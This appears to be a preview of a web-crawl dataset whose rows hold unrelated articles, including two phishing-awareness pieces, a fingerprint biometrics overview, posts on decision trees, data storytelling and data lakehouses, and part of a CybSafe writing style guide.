text stringlengths 234 589k | id stringlengths 47 47 | dump stringclasses 62 values | url stringlengths 16 734 | date stringlengths 20 20 ⌀ | file_path stringlengths 109 155 | language stringclasses 1 value | language_score float64 0.65 1 | token_count int64 57 124k | score float64 2.52 4.91 | int_score int64 3 5 |
|---|---|---|---|---|---|---|---|---|---|---|
What do virtually all Phishing Emails have in common? By understanding what Phishing Emails have in common, you can quickly identify them and avoid these threats.
What is phishing?
Phishing is a method used by hackers to collect personal information using deceptive e-mails and websites. It’s a form of attack that uses disguised email as a weapon.
The main objective is to trick the target into believing that the message is legitimate. It could be crafted to look like a note from a senior employee within their firm. Sometimes they are made to look like a request from their bank. It may direct the victim to download an attachment or to click to link.
However, phishing emails are distinct and can be easily identified by someone who is well informed about the characteristics of this kind of cyber-attack.
In most cases, phishing emails appear to be from a real person, a trusted entity, or a company with which the target is likely to do business.
Phishing attacks are one of the oldest techniques used in cyberattacks, dating back to the 1990s. Despite being in existence for quite some time, phishing attacks are becoming more sophisticated and sinister with a rapid technological development rate.
Phishing is still one of the most widespread and most exploited techniques by black-hats, especially during crises such as SARS or COVID-19.
In this article, we will address some of the striking similarities between various phishing emails. We will look at multiple types of phishing attacks. We will describe vulnerabilities mostly exploited and show how to position your company or yourself against such security incidences.
A phishing kit is a collection of software tools that makes it easier for people with little or no technical skills to execute an attack. A typical phishing kit is made of website development software with a simple, low/no-code graphical user interface (GUI).
The phishing kit comes complete with graphics, sample scripts, and email templates that an attacker can readily use to create legitimate correspondences. Some phishing kits come along with telephone numbers, a list of vulnerable e-mail addresses, and various software to automate the malware distribution process.
Types of phishing
One thing that all phishing emails have in common is the disguise. Attackers cover their email address so that it looks like it’s coming from a legitimate user. Or, they create fake websites that look like legitimate ones trusted by the target. In some cases, they use foreign character sets to disguise URLs.
With that in mind, we can classify various forms of attack as phishing attacks. Classification can be done in several ways, including the purpose of the phishing attempt, intrusion technique, etc. Generally, phishing emails aims at two things:
- Trick the victim into handing over sensitive information, often a username and a password, that the attacker can easily breach a system or account.
- Download malware. In this case, an attacker aims at deceiving the target to infect their computer by installing malware or a local access Trojan to infect their computers. For instance, a phishing mail may be sent to an HR officer with an attachment that claims to be a job seekers’ resume. The attachments are mostly in .zip files or Microsoft Office documents embedded with malicious codes or links.
1. Email Phishing
Most phishing attacks are sent via email. In these techniques, the hacker sets up a fake domain that mimics a genuine organization and then sends lots of generic requests to an identified target through the mail. The fraudulent substitution always involves replacing characters, such as ‘n’ and ‘r’ (‘rn’)close to each other to appear as ‘m’. In some cases, the crooks may decide to use the organization’s name in the domain, such as email@example.com, hoping that it will appear as ALIBABA in the target’s inbox.
There are several ways to spot a phishing email, and by the end of this article, you should be able to spot one quickly. You will also be able to guide others to identify Phishing emails.
As a general rule, always check and carefully scrutinize the email address of a message asking you to click a link or download an attachment.
Whaling attacks target senior executives. Despite having the same goal as any other form of a phishing attack, whaling attacks tend to be more subtle.
Because the technique is used on high-profile individuals within an organization, the methodology does not employ fake links and malicious URLs in breaching a system.
There have been increasing cases of whaling attacks on various sectors involving bogus tax returns in the recent past. Tax forms are valuable to hackers. They contain a wealth of important information such as social security numbers, addresses, bank account information, and the targeted individual’s official full names.
3. Vishing and Smishing
When using either vishing or smishing techniques to hack a target, telephones replace emails as the primary communication method.
In smishing attacks, a cybercriminal sends phishing texts to a target through text messages using a telephone. The message is drafted and tuned just as the email could have been. The objective is to convince the victim that the message is from a legitimate or trusted source.
In Vishing attacks, the cyber-criminal deceives its target through an actual phone call.
One of the common tricks used by hackers to execute a vishing attack is posing as a fraud investigator. The attacker may pose to be from a card company or a bank and pretend to inform the target about accounts that were breached.
4. Spear Phishing
Spear phishing is a sophisticated method of attack involving email. This technique is used to breach a specific person. Cyber-criminals who exploit their targets through these techniques already have some information about their targets, such as;
- Name and physical address
- Place of employments
- Title of job
- Specific information about duty at work
- Email address
One of the most detrimental phishing attacks ever done, the hacking of the Democratic National Committee, was accomplished with the aid of spear phishing. The first round of attacks involved sending emails containing malicious attacks to more than 1 000 email addresses. The second wave of the attack led to a better part of the committee members sharing their passwords.
5. Angler Phishing
Social media platforms have given hackers a new attack vector. There are various fake URLs, tweets, cloned websites, instant messaging techniques, and posts that can be used to persuade people to download malware or divulge sensitive information.
For instance, Elon Musk and Bill Gates are among the top profiles whose Twitter accounts have been recently used to spike attacks. The latest one was done using bitcoins and a message convincing targets to give back to society.
Data willingly posted by people can also be used to create highly targeted attacks. In 2016, a group of hackers conducted a sophisticated attack through Facebook. Facebook users received messages informing them that they had been mentioned in a post. Cyber-criminals initiated this message. Upon clicking the link, it would install malware or Trojan into their personal computers. The second phase of the attack comprised of the target’s account being breached. Immediately, they used the compromised web browser to access their Facebook account. The hackers managed to control various accounts, steal important data, and spread the infection to victims’ friends through their accounts.
What do Virtually all Phishing Emails have in Common?
1. The message is sent from a public email domain
There’s no legitimate organization that can send emails from an address that ends with ‘@gmail.com’. Not even Google can use such addresses. Most organizations, even the small ones, have their domain and company accounts. For instance, Google is most likely to use ‘@google.com’ when sending legitimate emails to their clients. Therefore, if the domain names match that of the sender, the message is probably from a legitimate user, and the message is most likely to be legitimate.
You can always verify an organization’s domain name by typing the company’s name into a reliable search engine. This makes it simple to detect phishing emails. However, cybercriminals are more advanced, and therefore it requires one to be more vigilant to detect these intruders.
An important tip to note: look at the email address and not just the sender.
Below is a phishing mail mimicking PayPal. Most crooks can create bogus email addresses and even select a display name that does not relate to the email in any way.
This is a nearly flawless scam email. It is professionally styled and believable. The email uses PayPal’s logo at the top of the message, making it undetectable to an ‘ignorant’ target. However, there’s a huge red flag; the sender’s address is noted as ‘firstname.lastname@example.org’ instead of having an organization name in the domain to indicate that it had come from an individual at PayPal, for instance, (@) PayPal.
Most hackers maximize their target ignorance, and in most cases, mere inclusions of a known company name anywhere in the message are enough to trick people. The targeted individual may glance at the word PayPal in the email address and be satisfied. In some cases, others may not even differentiate between the domain name and the local part of the address.
2. They are poorly written emails with an odd writing tone
Poor spelling and grammar should always be the first red flag for any email received, whether from a known or unknown source. Some people are convinced that such errors arise due to an inefficient “filtering system”; however, hackers exploit this technique on the most gullible targets only. The catch here is that if an individual is unable to pick the minor hints at the first stages of the intrusion, then most likely, they won’t be able to pick clues during the scammer’s endgame.
When executing a phishing attack, hackers do not have to monitor inboxes and send tailored responses. To reach a wider audience and lure more victims, they prefer randomly dumping thousands of crafted messages on unsuspecting persons.
Important tip: look for grammatical errors and not spelling mistakes.
In most cases, hackers will use a translation machine or spellchecker when crafting phishing messages. These apps can give the right words with accuracies close to 100, but they do not necessarily arrange the words into the proper context.
For example, the image shown above is a phishing scam imitating windows. Every word is spelled correctly except for various minor grammatical errors that a native English speaker wouldn’t make, such as “We detected something unusual to use an application.” There is also an array of missed words in various sentences such as “Please contact Security Communication Center,” “a malicious user might trying to access,” etc.
Everyone makes typing mistakes from time to time and especially when in a hurry; however, you should be able to thoroughly scrutinize the error if it’s a clue to something more sinister.
3. There are suspicious attachments or links
Phishing emails are launched in various forms. Although this article has majorly focused on email phishing, scammers can also use phone calls, social media posts, and text messages.
However, despite the channel or techniques through which phishing emails are presented, they will always contain a payload. All phishing emails are embedded with links to bogus websites or infected attachments, prompting you to download them.
An infected attachment, in this case, is any document that contains malware. Below is an ideal example of a phisher claiming to send an invoice.
From the above image, it’s impossible to know what the message entails until they open the attachment, whether the recipient was expecting to receive an invoice from the sender or not. Upon opening the message, the receiver will realize that the message is not intended for them, but then it will be too late, and the malware will have been unleashed on their computers.
4. There’s a sense of urgency, or the message calls for prompt action.
Hackers are aware that most human beings are procrastinators. Despite the significance of the message, most people will decide to deal with the information later.
The law of nature has it that the more you think or focus on something, the more likely you notice that something is off. Maybe in the day, you realize that the claimed organization doesn’t contact you at the same address, or perhaps you realize that your other colleagues at work did not receive the same email. Even if you don’t get the “Ahaa!” moment, reading the message with fresh eyes might unveil its true nature.
And for these reasons, most phishing emails request that you act immediately or that chance will be gone. A trait that is very evident in almost every example we’ve used above.
Below is a typical example:
Such phishing scams are very sinister and dangerous at the same time since it jeopardizes the recipients’ (possibly a junior employee) position at work.
5. They have Oddly Generic Greetings
Phishing scammers target millions of people and therefore send lots of phishing emails a day. With this work volume, they heavily rely on phishing tools or applications to help them generate phishing templates. Commonly used greetings include “Dear Customer” implying “Your Company” or “Your Bank.” This kind of sensitive email should have more details about you as they originate from someone who knows you better, a partner you’ve met before, or a colleague you once served with at the same workstation.
Educate your employees to prevent phishing
Education is power, and knowledge liberates. Regularly remind your employees of what they should be looking for when handling mails or information within the organization. This does not necessarily mean having frequent awareness training programs as a few well-placed posters within the office can serve the purpose. | <urn:uuid:4f20b4a6-51ae-435a-9106-9231f2cf7e80> | CC-MAIN-2022-40 | https://cyberexperts.com/what-do-virtually-all-phishing-emails-have-in-common/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00294.warc.gz | en | 0.939756 | 2,931 | 3.078125 | 3 |
Information and Communication Technology (ICT) has infiltrated global classrooms at an exceedingly rapid pace. Computers form an integral part of modern day learning environment, by offering cutting-edge software and classroom management tools that have led to improved student learning and better instructional techniques. On one hand, it has helped educators to increase student participation and achievement. On the other hand, such heavy reliance on computer-aided learning has made 100% computer availability a necessity in a digital classroom setting.
This whitepaper discusses the various IT challenges that system administrators managing computer labs at schools and colleges encounter. It also highlights how a Reboot to Restore technology can help school administrators to create an open and unrestricted learning environment for students with minimal efforts.
Learn more about this non-restrictive technology and its benefits in education – | <urn:uuid:a531b470-9fa0-4e8f-9647-a0a9c9b0bdfc> | CC-MAIN-2022-40 | https://www.faronics.com/document-library/document/non-restrictive-technology-in-education-the-reboot-to-restore-concept | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00294.warc.gz | en | 0.933164 | 160 | 3.359375 | 3 |
Stuart Crawford from Fair Isaac’s R&D group presented on New Approaches to Creating, Simplifying and Visualizing Rules. While decision trees can be very clear, they can also become very complex. His group has been working on algorithms for simplifying decision trees. Because decision trees often have repeating sub-trees – pieces of the tree that are identical but in different paths – a Directed Action Graph is often much simpler. The graph can re-use the logic by linking to it in multiple ways. Building one of these requires some fairly complex math to find the right nodes and ordering.
While these are simpler they can still be complex so the next step is to develop what is known as an Exception-based Directed Action Graph or EDAG. This takes the most common outcome and puts it at the top and then only has nodes for the other paths. In other words the action at the top is the default.
However this is not always enough. He showed an example of a 492 node decision tree reduced to 89 nodes in an EDAG. A 30,000 node (!) tree from a bank was reduced to a 480 node graph. These are clearly simpler but not simple.
An Action Graph is the next simplification – take an action and find all the logic that could result in that action. This becomes a single action graph. Complex trees and graphs can have many of these action graphs extracted from them and each is focused and easy to read.
Of course you could in fact author this way. Each action graph can be built separately, ordering can be changed and different variables used. Once you have the individual fragments you can merge them into a single decision tree or EDAG. The action graphs can be stitched together but you have the potential for errors when they are built separately like this. They can overlap – have two paths in different graphs that are the same but have different actions – or have gaps – where certain values are not covered across the various action graphs. Unless you can manage these overlaps and gaps, you cannot use the individual graphs for development.
Finally this approach allows you to generate comparisons between trees. Instead of showing structural differences, which can be confusing, logical differences can be shown as an EDAG. Much simpler.
I saw Stuart present this technology before and blogged it here. | <urn:uuid:2a2df3fd-6c3d-4879-a8d5-e90be68362af> | CC-MAIN-2022-40 | https://jtonedm.com/2008/10/30/new-approaches-to-creating-simplifying-and-visualizing-rules/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334620.49/warc/CC-MAIN-20220925225000-20220926015000-00294.warc.gz | en | 0.969049 | 473 | 2.9375 | 3 |
One of the things I'm really passionate about is data and how it can be used to influence decision-making. But everyone has their own personal biases and opinions that they use to create a narrative and this can affect how they look at data. So even when the data tells us one thing, we may see something completely different.
For example, I recently read an article which looked at what people actually die from in the US compared to what they search for on Google and what the media talks about. This showed that the number of people who die from terrorism or homicide is negligible compared to those who die from heart disease and cancer. But terrorism and homicide are what the media focus on in almost 50% of their coverage. Based on the media-driven narrative we’re fed, it’s very easy to believe that we’re living in a disaster zone, which is simply not the case.
I saw another example of how narratives can lead people to ignore the data recently when watching the federal election in Australia. From the moment the first few votes trickled in, it was clear who was going to win the election. But it was fascinating to see how the newsroom commentators clearly didn’t believe the data because they had already built up a narrative in their minds about the way it was going to go. So they were waiting for the data to magically change and it didn’t.
The reality is that statistics don't work that way - a small sample can tell you a lot about what the end result will be.
To me, these two examples encapsulate the problems that organizations have when it comes to believing personal opinion about what's happening in the business rather than the cold hard facts. Leaders in an organization need to take a step back and look at what the data is telling them about what's going on. They need to challenge the dominant narrative and focus on what the numbers are actually saying.
By continually questioning the narrative, you can see what’s really happening rather than what you think is happening. This is how you can make a real impact on your organization. If the government and media did this, then their narrative would focus on heart disease and cancer rather than terrorism and homicide and we would have a better chance of saving our loved ones.
Data Storytelling: How to Use Data Insights to Drive Action
If you want to know how to tell an acurate data story that compels people to action, download your free guide to data storytelling. | <urn:uuid:ef14709c-e10b-49df-9251-6f0f67801d58> | CC-MAIN-2022-40 | https://web-dev-yf-wp2.yellowfin.bi/blog/2019/07/believe-data-not-opinions | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334620.49/warc/CC-MAIN-20220925225000-20220926015000-00294.warc.gz | en | 0.973037 | 507 | 2.546875 | 3 |
By: Afeeza Ali and Surya Prakash
Modern user fingerprint authentication and verification systems have revolutionized ever since the use of biological properties of individuals became a part of identity management systems. The usage of intrinsic physiological or behavioural characteristics relieves an individual of remembering cumbersome passwords or tokens. Additionally, the usage of biometrics has rendered the duplication of the identity of a user more difficult than it was ever before. Although the involvement of biometric information has provided immense ease of use and effectiveness, their mismanagement and inefficient deployment may potentially cause permanent non-usability of an individual’s biometrics. Therefore, non-repudiation and the unique nature of biological features have made it imperative to ensure absolute resistance to being compromised. Consequently, although there have been various studies to propose techniques that improve recognition performance and strengthen the security of original biometric data, there exist a number of challenges that are currently under the scope of research.
Fingerprint authentication, face, iris and retina, keystroke dynamics, voice recognition, etc. are a few of the most prominently used biometrics for various applications worldwide. Among these, fingerprint biometric is the most popular means of user verification employed across popular biometric security applications including forensics, e-commerce, citizens’ registration applications used by governments, border control, etc. Fingerprint-based identification systems are largely used owing to the innate ease in collection and availability of multiple sources (10 fingers) for acquisition.
Fingerprints and Minutiae points
Patterns made by a collection of high peaking lines (ridges) and the space between these lines appearing as low shallow portions (valleys) on the surface of a fingertip represent a fingerprint. Ridge ending and ridge bifurcation are two of the most important minutia features of ridges. A ridge ending is a location where a singular ridge discontinues abruptly. A ridge bifurcation is a location where two ridges unite to form a single continuous ridge. Distinctive discontinuities in the ridge lines such as these are known as minutiae points. Fingerprint identification relies primarily on these minutiae points.
A fingerprint can be reconstructed if there is a leakage of precise information of minutiae points. This leads to the idea of securing raw fingerprint data by designing a one-way transformation of original minutiae points so that a possible compromise of the database can be mitigated by a reissuance of the accorded template. This is the key idea behind one of the most popular means of biometric template protection i.e., cancellable biometrics which employ the following steps.
- A digital image of a fingerprint is obtained at the sensor end and appropriate techniques are applied to extract the minutiae points.
- Unique, discriminatory features are computed from the minutiae points that form a unique fingerprint template corresponding to its original biometric data.
- The template generated is irreversibly transformed in a manner that any degradation suffered does not affect the matching process adversely. This secure template is safely stored in the database.
- A probe template is transformed similarly and is matched (in the transformed domain) with the previously stored templates to validate the ingenuity.
Several fingerprint template protection schemes such as , , among others have been proposed recently that incorporate the above-mentioned procedures to offer solutions to various new challenges faced in the scope of fingerprint biometrics .
Open challenges in fingerprint authentication:
Although fingerprints have remained dominant among biometric-based authentication systems in terms of convenience and low error rates, a steady increase in their deployment across various environments presents new challenges.
The first and most critical step in automated fingerprint authentication technologies is the acquisition of raw data. The quality of the fingerprint image substantially affects the overall system performance . However, the acquisition of precise quality impressions is a challenging job owing to physical distortions and translation/rotation while capturing the digital image of a fingerprint. Low quality, partial/arch type fingerprints still need to be worked on to ensure that the system manages to perform satisfactorily.
The possibility of fingerprint reconstruction from the information of minutiae negates the feasibility of storing raw minutiae points as a biometric template , . Consequently, several biometric protection schemes put forth ways to replace the biometric data by applying a suitable transformation that is unique to a user without affecting the recognition performance. Nonetheless, it is still a challenging job among the biometric research community to fully quantize the information obtained from original data and produce an absolutely irreversible template that doesn’t give away any information of the original minutiae points it was constructed from. It is a significant threat to the user identity if template non-invertibility is unmet.
Rampant use of biometrics in multifaceted applications has increased the risk of identity theft significantly. The past decade has seen a surge in malicious attempts of identity fraud by forging biometrics. For instance, dummy fingerprints constructed using gelatine, clay, and silicone molds are common means of spoof attacks by identity forgers to fabricate fingerprints . Existing spoof detection methods suffer from a bottleneck of dealing with low accuracy rates.
As a result, designing an algorithm that encompasses all the discussed challenges and more arguably stands as the biggest challenge among researchers studying human independent recognition systems.
Scope of future research for fingerprint authentication
Increasing penetration of fingerprint technology for high-security transactions in the market opens up the scope of research in the area that needs renewed attention to the recent challenges. Following are some of the buzzing areas that need research attention:
- Design of anti-spoof algorithms that detect fingerprint forgery or any other presentation attacks along with ensuring low error rate in recognition.
- Incorporating image processing techniques that offer enhanced image quality to facilitate high-quality feature extraction. This can help handle partial/arch type, low-quality input images.
- Design of rotation/translation invariant and alignment-free feature extraction algorithms.
- Design of techniques that employ many-to-one feature mapping to ensure non-invertibility of stored templates.
- Development of algorithms that fully quantize raw templates to allow perfect distortion of minutiae distribution and yet retain the discriminative property.
- Development of secure non-invertible template generation techniques with lesser computation cost and higher performance.
Baghel Vivek Singh, Syed Sadaf Ali, and Surya Prakash. “A non‐invertible transformation-based technique to protect a fingerprint template.” IET Image Processing, 2021. DOI: https://doi.org/10.1049/ipr2.12130
Sandhya, Mulagala, and Munaga VNK Prasad. “Biometric template protection: A systematic literature review of approaches and modalities. Biometric Security and Privacy, pp. 323-370, 2017.
Ali, Syed Sadaf, Iyyakutti Iyappan Ganapathi, and Surya Prakash. “Robust technique for fingerprint template protection.” IET Biometrics, 7(6), pp. 536-549, 2018.
Ali, Syed Sadaf, and Surya Prakash. “3-Dimensional secured fingerprint shell.” Pattern Recognition Letters, 126, pp. 68-77, 2019.
Ali, Syed Sadaf, Iyyakuti Iyappan Ganapathi, and Surya Prakash. “Fingerprint Shell with impregnable features.” Journal of Intelligent & Fuzzy Systems 36(5), pp 4091-4104, 2019.
Jain, Anil K., Karthik Nandakumar, and Abhishek Nagar. “Fingerprint template protection: From theory to practice.” Security and privacy in Biometrics. Springer, London, pp. 187-214, 2013.
Win, Zin Mar, and Myint Myint Sein. “Texture feature-based fingerprint recognition for low quality images.” 2011 International Symposium on Micro-Nano Mechatronics and Human Science, IEEE, 2011.
Cappelli, Raffaele, et al. “Fingerprint image reconstruction from standard templates.” IEEE transactions on pattern analysis and machine intelligence, 29(9), pp. 1489-1503, 2007.
Feng, Jianjiang, and Anil K. Jain. “Fingerprint reconstruction: from minutiae to phase.” IEEE transactions on pattern analysis and machine intelligence, 33(2), pp. 209-223, 2010.
Uliyan, Diaa M., Somayeh Sadeghi, and Hamid A. Jalab. ‘Anti-spoofing method for fingerprint recognition using patch based deep learning machine.’ Engineering Science and Technology, an International Journal, 23(2), pp. 264-273, 2020.
Cite this article:
Afeeza Ali and Surya Prakash (2021) Biometric Fingerprint Authentication: Challenges and Future Research Directions, Insights2Techinfo, pp1 | <urn:uuid:82407e8b-1188-44db-8d6c-7310b78b8588> | CC-MAIN-2022-40 | https://insights2techinfo.com/biometric-fingerprint-authentication-challenges-and-future-research-directions/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334992.20/warc/CC-MAIN-20220927064738-20220927094738-00294.warc.gz | en | 0.883048 | 1,943 | 2.546875 | 3 |
Driven by Big Data and cost-effective cloud storage, the hype around Data Lake as an alternative to traditional data warehouse systems gained steam and promised to capture the value of large and complex data assets at scale. In practice, however, Data Lakes quickly turned into data swamps where data from all sources is dumped with minimal regard for data governance best practices.
Similarly, the schema-on-write construct used to build rigid database models with traditional data warehouse systems also fails to meet the needs of modern Big Data applications. The vast volume, velocity, and variety of Big Data make it challenging to model all information assets in a unified and structured format. And without following an adequate data governance framework, data quality remains elusive, especially as the data is managed and retained in silos and organizations fail to achieve a holistic enterprise-wide view of all of their Big Data assets.
The Open Alternative: What is Data Lakehouse?
Data Lakehouse refers to a new architecture pattern that emerged as an alternative to traditional data warehouse and Data Lake technologies, promising an optimal tradeoff between the two approaches to storing big data. Data Lakehouse is primarily based on open and direct-access file formats such as the Apache Parquet, supports advanced AI/ML applications, and is designed to overcome the challenges associated with the traditional Big Data storage platforms.
The following limitations of Data Warehouse and Data Lakes have driven the need for an open architectural pattern that takes the data structures, management, and quality features from Data Warehouse systems and introduces them to the low-cost cloud storage model employed by the Data Lake technology:
- Lack of Consistency: Data Lake and Data Warehouse systems require high cost and time to maintain data consistency, especially when sourcing large data streams from various sources. For instance, a failure at a single ETL step will likely introduce data quality issues that cascade across the Big Data pipeline.
- Slow Updates and Data Staleness: Storage platforms built on the Data Warehouse architecture suffer from the issue of Data Staleness when frequently updated data takes days to load. As a result, IT is forced to use (relatively) outdated data to make decisions in real-time in a market landscape where proactive decision-making and the agility to act is a key competitive differentiation.
- Data Warehouse Information Loss: Data Warehouse systems maintain a repository of structured databases, but the intense focus on data homogenization negatively affects data quality. Converging all data sources into a single unified format often results in the loss of valuable data due to incompatibility, lack of integration, and the dynamic nature of Big Data.
- Data Lake Governance and Compliance Challenges: The Data Lake technology aims to address the challenge by transitioning to the schema-on-read model that allows you to maintain a repository of raw heterogeneous data with multiple formats without a strict structure. While it can be argued that the stored information is primarily static, any external demands on updating or deleting specific data records are a challenge facing Data Lake environments. There’s no easy way to change reference data or index and update a data record within the Data Lake without first scanning the entire repository, which may be required by external compliance laws such as the CCPA and GDPR.
Data Lakehouse Reference Architecture
The Data Lakehouse architecture offers the following key capabilities to address the limitations associated with Data Lakes and the traditional Data Warehouse systems:
- Schema Enforcement and Evolution allows users to control the evolving database structures and data quality issues.
- Ready for Structured and Unstructured Data allows a wider choice of data management strategies, allowing users to choose between the various schema and models based on applications.
- Open Source Support and Standardization ensures compatibility and integration with multiple platforms.
- Decoupled from the Underlying Infrastructure allows IT to build a flexible, composable cloud infrastructure and provision resources for dynamic workloads without breaking the applications running on it.
- Support for Analytics and Advanced AI Applications to run directly from the Data Lake instead of reformulating copies of information in a data warehouse.
- Optimal Data Quality: Atomicity, Consistency, Isolation, and Durability (ACID) compliance previously available in the Data Warehouse systems ensures data quality as new data is ingested in real-time.
The Data Lakehouse Case Example
We recently worked with a large biotech company struggling to manage an on-premise traditional Oracle-based data platform. The company could not scale new use cases for machine learning teams as new information sources were added, leading to siloed information assets and inadequate data quality.
Following an in-depth 8-week assessment and multiple workshops to understand the company’s true business requirements and Big Data use cases, Mactores worked with their business and IT teams to transform their existing data pipeline and incorporate an advanced Data Lakehouse solution. Post-implementation, the result was a 10x agility in their DataOps process, and a 15x improvement for machine learning applications as teams spent less time on fixing data quality issues and more time building business-specific ML use cases. Additionally, the business teams now have access to the self-service platforms to create custom workflows and process new datasets critical to their business decision-making, all independent of the IT team.
Your Data Lakehouse Strategy for the Long-Term
The improvements were largely associated with using the Data Lakehouse architectural pattern to unify robust data management features and advanced analytics capabilities, making critical data accessible to business users from all departments within the organization. The open format further allowed the company to overcome issues such as performance, inadequate availability, high cost, and vendor lock-in that comes with the increased dependence on proprietary technologies. Stringent regulatory requirements are also met satisfactorily as the Data Lakehouse allows users to upsert, delete, update and change data records at short notice.
Over the long term, the transition to open-source technologies and the low cost of cloud storage will contribute to the rising popularity of promising new Big Data storage architectural patterns that offer an optimal mix of features from Data Warehouse and Data Lake systems. As this trend continues to rise, the choice between Data Warehouse, Data Lake, and a Data Lakehouse will largely depend on how well users can maximize data quality and establish a standardized data governance model to achieve the desired ROI on their Big Data applications.
If you are interested in discussing your organizations lake house strategy, Lets Talk. | <urn:uuid:d7ddd827-e62c-442c-984c-c0e281b25cd7> | CC-MAIN-2022-40 | https://mactores.com/blog/data-lakehouse-an-open-alternative-to-data-lake-and-data-warehouse-for-high-roi-big-data-applications | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335257.60/warc/CC-MAIN-20220928145118-20220928175118-00294.warc.gz | en | 0.912467 | 1,295 | 2.5625 | 3 |
What is definition of phishing?
According to a recent infographic produced by via resource, 37.3 million users were subject to phishing attacks in 2012, but what definition of phishing is being used? What does phishing actually mean?
As consumers increase the amount of time that they spend online, cybercriminals are ramping up their productivity – launching larger, more efficient and increasingly targeted attacks against brands both in and outside the financial services industry.
PhishMe delivers email-based anti-phishing solutions. Through our interactions with prospects and customers, we’ve realized that there are several different definitions of phishing floating around and that often the term “phishing” is used interchangeably with terms like “malware” and “spam”.
What’s in a word? Well, it’s an important distinction. While both phishing, malware and spam are rampant in today’s threatscape, they are not one and the same. Pure phishing threats are analyzed and acted upon differently than spam and malware.
A general definition of phishing by Wikipedia:
“Phishing is the act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication.”
Phishing is, admittedly, a wide-reaching term. There are several ways to carry out a phishing attack, which is likely where some of the confusion comes into play. In the broad sense, you could say that phishing is any attempt on behalf of a cybercriminal to steal credentials. This can be carried out via a phishing website where the victim is prompted to enter his credentials or via a malicious executable.
At PhishMe, we categorize a malicious threat as phishing according to the following two rules:
- If the page is representing a brand and asks for any login/personal information.
- If the URL is not say “companyname.com, and if you do a Whois on it, the domain is not registered to that company name. So, if the URL is ilikepuppies.com and displays the logo of a major brand, it is trying to make itself look like that major brand.
What’s the difference between Phishing and Malware?
The relationship between phishing and malware is a bit blurry, mostly because they often work together to achieve the goal of the cybercriminal. In fact, the term “malware” is often included in phishing discussions.
Now that being said, here is Wikipedia’s malware definition:
“Malware, short for malicious software, is software used or programmed by attackers to disrupt computer operation, gather sensitive information, or gain access to private computer systems. It can appear in the form of code, scripts, active content, and other software. ‘Malware’ is a general term used to refer to a variety of forms of hostile or intrusive software.”
“….Malware includes computer viruses, ransomware, worms, Trojan horses, rootkits, keyloggers, dialers, spyware, adware, malicious BHOs, rogue security software and other malicious programs; the majority of active malware threats are usually worms or Trojans rather than viruses…”
One key distinction is that not all malware is delivered via email. Malware converges with phishing when it is being used as an accessory to execute the phishing attempt.
When it comes to defining today’s malicious threats, where do you encounter confusion? How do you differentiate between them? Share your thoughts in the comments section below. | <urn:uuid:d717901b-dfe1-4095-8912-64faa52456e8> | CC-MAIN-2022-40 | https://cofense.com/what-is-definition-of-phishing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00294.warc.gz | en | 0.944414 | 767 | 3.203125 | 3 |
A guide to our tone of voice
Before we get started, a warning: You’ll probably find this guide hard to read. That’s because you’re human. Humans find everything hard to read. Books, product guides, blogs, and flat-pack furniture manuals (top of the list). They’re all the same. CybSafe copy acknowledges this. In response, our copy follows some rules. The rules make our copy easier to read. The rules are listed in part 1 below. To write like CybSafe, follow them. However, the rules will only get you so far. To really write like CybSafe, you’ll need to convey our tone. You’ll need to favour certain words. You’ll need to add rhythm to your writing. You’ll need to make judgement calls. Occasionally, you’ll need to break reading-ease rules. Tips for conveying CybSafe’s tone are covered in part 2. But let’s start with part 1 – making your writing easy to read.
Part 1: How to make your writing easy to read
Use sentence case for all titles and subtitles
Sentence case makes our titles and subtitles easy to read. We use sentence casing everywhere. It makes us look professional and aligned. When writing titles and subtitles, only capitalise the following words:
- The first word of the title or heading
- The first word of a subtitle
- The first word after a colon, em dash, or end punctuation in a heading
- Nouns followed by numerals or letters
- Proper nouns (such as the names of people or groups)
Use short sentences
Short sentences are easy to follow. Keep sentences short. Favour full stops over commas. It’s simple stuff.
Use short paragraphs
Short paragraphs are also easy to follow. Plus, short paragraphs inject your copy with white space. When readers see your copy as a whole, short paragraphs ensure they’re not facing an impenetrable wall. Instead, they see digestible segments.
Use simple words
Simple words are easy to take in. Avoid poetic language. Keep syllables low. Favour “use” over “utilise”. Favour “start” over “commence”.
Reading tests show people don’t read copy in the way it’s written or reviewed. They don’t start from sentence one then continue sequentially. Instead, they see everything at once and scan it all over. Subheadings help with the scanning. They’re signals. Used wisely, they can deliver the message without requiring any further reading. Subheading should summarise what comes in the paragraph. The subheadings in this guide are a good example.
Jargon may puzzle some readers. Make things simple. Use plain English to keep people engaged.
Conjunctions are connecting words like ”and” and “but”. Conjunctions keep people reading. Use them, and don’t be afraid to use them at the start of your sentences and paragraphs.
Use the active voice
Pen your subjects as active rather than passive. “The students were reading” is active, as the students were getting something done. “The book was read” is passive. The students played a passive role in the reading. They’re not even mentioned in the sentence. If a phrase makes sense after adding “by monkeys” to the end of it, then it‘s passive. (Credit for this analogy goes to Monzo!) 🐒
Clichés are tired and unexciting. The phrase “it’s like swimming through treacle” now fails to paint the picture of someone swimming through treacle. It’s unoriginal and unremarkable. The substitute “it’s like wading through hummus” still indicates a struggle, but it’s novel. It paints a picture. Thinking readers may even “feel” the struggle. Avoid clichés to keep people hooked.
Adverbs modify or qualify things. She ran quickly. He said forcefully. With skill, you can eliminate them. She sprinted. He spat. Removing adverbs reduces word count. It also invigorates copy.
Hemingway highlights complex sentences and words. It also highlights adverbs and passive phrases. Use Hemingway to weed out complex sentences, words, adverbs and passive phrases. Hemingway helps improve reading ease.
Part 2: How to “sound” like CybSafe
2.1 Choose your tone
